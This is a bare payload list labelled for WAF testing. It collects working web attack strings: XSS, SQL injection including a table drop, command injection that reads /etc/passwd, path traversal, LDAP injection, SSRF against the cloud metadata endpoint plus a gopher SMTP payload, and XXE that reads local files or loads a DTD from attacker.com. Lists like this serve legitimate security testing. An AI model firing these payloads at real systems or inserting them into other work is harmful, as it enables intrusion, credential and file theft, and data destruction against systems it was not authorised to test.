# Comprehensive Attack Payloads for WAF Testing
# XSS Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
<svg onload=alert(1)>
"><script>alert(String.fromCharCode(88,83,83))</script>

# SQL Injection Payloads
' OR 1=1 --
' UNION SELECT null,version() --
'; DROP TABLE users; --
admin'/**/OR/**/'1'='1
1' AND (SELECT COUNT(*) FROM sysobjects) > 0 --

# Command Injection Payloads
; cat /etc/passwd
| whoami
& net user
$(id)
`ls -la`

# Path Traversal Payloads
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# LDAP Injection Payloads
*)(&
*)(|(mail=*))
*))%00
)(cn=*))(|(cn=*

# SSRF Payloads
http://localhost:22
http://169.254.169.254/latest/meta-data/
gopher://127.0.0.1:25/_HELO%20localhost%0AMAIL%20FROM%3A%3Chacker@site.com%3E%0ARCPT%20TO%3A%3Cvictim@site.com%3E%0ADATA%0AFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%0ATo%3A%20%3Cvictim@site.com%3E%0ADate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%0ASubject%3A%20AH%20AH%20AH%0A%0AYou%20didn%27t%20say%20the%20magic%20word%20%21%0A%0A%2E%0AQUIT%0A

# XXE Payloads
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" >]><foo>&xxe;</foo>
